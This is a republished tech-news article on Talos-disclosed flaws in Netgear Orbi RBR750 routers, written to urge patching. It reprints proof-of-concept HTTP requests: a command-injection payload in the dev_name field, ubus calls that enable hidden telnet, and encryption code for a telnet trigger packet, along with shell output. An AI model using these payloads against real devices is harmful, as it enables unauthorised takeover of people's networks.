Tuesday, May 30
Subscribe
Latest News

If your Netgear Orbi router isn’t patched, you’ll want to change that pronto – Ars Technica

Alex ChenBy No Comments8 Mins Read
Enlarge / An Orbi 750 series router.

Netgear

If you rely on Netgear’s Orbi mesh wireless system to connect to the Internet, you’ll want to ensure it’s running the latest firmware now that exploit code has been released for critical vulnerabilities in older versions.

The Netgear Orbi mesh wireless system comprises a main hub router and one or more satellite routers that extend the network’s range. By setting up multiple access points in a home or office, they form a mesh system that ensures Wi-Fi coverage is available throughout.

Remotely injecting arbitrary commands

Last year, researchers on Cisco’s Talos security team discovered four vulnerabilities and privately reported them to Netgear. The most severe of the vulnerabilities, tracked as CVE-2022-37337, resides in the access control functionality of the RBR750. Hackers can exploit it to remotely execute commands by sending specially crafted HTTP requests to the device. The hacker must first connect to the device, either by knowing the SSID password or by accessing an unprotected SSID. The severity of the flaw is rated 9.1 out of a possible 10.

In January, Netgear released firmware updates that patched the vulnerability. Now, Talos published a proof-of-concept exploit code along with technical details.

“The access control functionality of the Orbi RBR750 allows a user to explicitly add devices (specified by MAC address and a hostname) to allow or block the specified device when attempting to access the network,” Talos researchers wrote. “However, the dev_name parameter is vulnerable to command injection.”

The exploit code released is:

POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
Host: 10.0.0.1
Content-Length: 104
Authorization: Basic YWRtaW46UGFzc3cwcmQ=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
Connection: close

action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list

The device will respond with the following:

   [email protected]:/tmp# ps | grep ping
   21763 root  	1336 S	ping 10.0.0.4

Two other vulnerabilities Talos discovered also received patches in January. CVE-2022-36429 is also a remote command execution flaw that can be exploited by sending a sequence of malicious packets that create a specially crafted JSON object. Its severity rating is 7.2.

The exploit begins by using the SHA256 sum of the password with the username ‘admin’ to return an authentication cookie required to start an undocumented telnet session:

POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 217
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"","timeout":900}],"jsonrpc":"2.0","id":3}

The ‘ubus_rpc_session’ token needed to start the hidden telnet service will then appear:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 829
Connection: close
Date: Mon, 11 Jul 2022 19:27:03 GMT
Server: lighttpd/1.4.45

{"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}

The adversary then adds a parameter called ‘telnet_enable’ to start the telnet service:

POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 138
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/status.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}

The same password used to generate the SHA256 hash with the username ‘admin’ will then allow an attacker to log into the service:

$ telnet 10.0.0.4
Trying 10.0.0.4...
Connected to 10.0.0.4.
Escape character is '^]'.

login: admin
Password: === IMPORTANT ============================
 Use 'passwd' to set your login password
 this will disable telnet and enable SSH
------------------------------------------


BusyBox v1.30.1 () built-in shell (ash)

 	MM       	NM                	MMMMMMM      	M   	M
   $MMMMM    	MMMMM            	MMMMMMMMMMM  	MMM 	MMM
  MMMMMMMM 	MM MMMMM.          	MMMMM:MMMMMM:   MMMM   MMMMM
MMMM= MMMMMM  MMM   MMMM   	MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
MMMM=  MMMMM MMMM	MM   	MMMMM	MMMM	MMMM   MMMMNMMMMM
MMMM=   MMMM  MMMMM      	MMMMM 	MMMM	MMMM   MMMMMMMM
MMMM=   MMMM   MMMMMM   	MMMMM  	MMMM	MMMM   MMMMMMMMM
MMMM=   MMMM 	MMMMM,	NMMMMMMMM   MMMM	MMMM   MMMMMMMMMMM
MMMM=   MMMM  	MMMMMM   MMMMMMMM	MMMM	MMMM   MMMM  MMMMMM
MMMM=   MMMM   MM	MMMM	MMMM  	MMMM	MMMM   MMMM	MMMM
MMMM$ ,MMMMM  MMMMM  MMMM	MMM   	MMMM   MMMMM   MMMM	MMMM
  MMMMMMM:  	MMMMMMM 	M     	MMMMMMMMMMMM  MMMMMMM MMMMMMM
	MMMMMM   	MMMMN 	M       	MMMMMMMMM  	MMMM	MMMM
 	MMMM      	M                	MMMMMMM    	M   	M
   	M
 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
 ---------------------------------------------------------------
[email protected]:/#

The other patched vulnerability is CVE-2022-38458, with a severity rating of 6.5. It stems from the device prompting users to enter a password over an HTTP connection, which isn’t encrypted. An adversary on the same network can then sniff the password.

The vulnerability that refused to die

A fourth vulnerability Talos discovered, tracked as CVE-2022-38452, has not yet been patched. Talos released details about it anyway, in keeping with the policy of disclosing vulnerability information within 90 days of it being privately reported to the vendor. The flaw stems from hidden telnet functionality and allows adversaries to remotely execute commands.

Netgear developers previously introduced an update that removed a toggle switch in a hidden debug page that could be used to turn the telnet service on or off. The fix, unfortunately, was incomplete.

“While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear_telnet),m” Talos explained. While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.”

def crypt_64bit_up(self, x, y):
	sbox = self.flattened_sBox
	pArray = self.flattened_pArray
	for i in range(0, 0x10):
    	z = pArray[i] ^ x
    	x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
    	x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
    	x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
    	x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
    	x = y ^ x
    	y = z
	x = x ^ pArray[-2]
	y = y ^ pArray[-1]
	return (x, y)

def crypt_64bit_down(self, x, y):
	sbox = self.flattened_sBox
	pArray = self.flattened_pArray
	for i in range(0x11, 1, -1):
    	z = pArray[i] ^ x
    	x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
    	x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
    	x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
    	x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
    	x = y ^ x
    	y = z
	x = x ^ pArray[1]
	y = y ^ pArray[0]
	return (x, y)

An adversary who has the username, password, and MAC address of the vulnerable device’s br-lan interface can go on to start telnet:

$ ./enable_telnet_poc.py
Plaintext payload:
00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
Encrypted payload:
00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d

$ telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
 === LOGIN ===============================
  Please enter your account and password,
  It's the same with DUT GUI
 ------------------------------------------
telnet account: admin
telnet password:

BusyBox v1.30.1 () built-in shell (ash)

  .oooooo.         	.o8    	o8o       	.o.   	ooooooo  ooooo
 d8P'  `Y8b       	"888    	`"'      	.888.   	`8888	d8'
888  	888 oooo d8b  888oooo.  oooo     	.8"888.    	Y888..8P
888  	888 `888""8P  d88' `88b `888    	.8' `888.    	`8888'
888  	888  888  	888   888  888   	.88ooo8888.  	.8PY888.
`88b	d88'  888  	888   888  888  	.8' 	`888.	d8'  `888b
 `Y8bood8P'  d888b 	`Y8bod8P' o888o	o88o 	o8888o o888o  o88888o

 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, 10.0.3440.3644)
 ---------------------------------------------------------------
[email protected]:/#

As noted earlier three of the four vulnerabilities were patched in January. The Orbi Router Model RBR750 user manual say that users can check for available updates and install them by putting orbilogin.com, entering the administrative credentials, and selecting ADVANCED > Administration > Firmware Update > Online Update.

While CVE-2022-38452 has yet to be patched, the other three flaws have been fixed. Users of these devices should ensure they are running firmware version 4.6.14.3, which is the latest release at the moment.

source

Share.
Avatar photo

Alex Chen is a rising star among tech journalists. Alex brings a unique perspective to his reporting at DroidGazette with his background in engineering and passion for consumer technology. Since joining DroidGazzete team a few years ago, he has quickly established himself as the go-to reporter for all things consumer technology.

Related Posts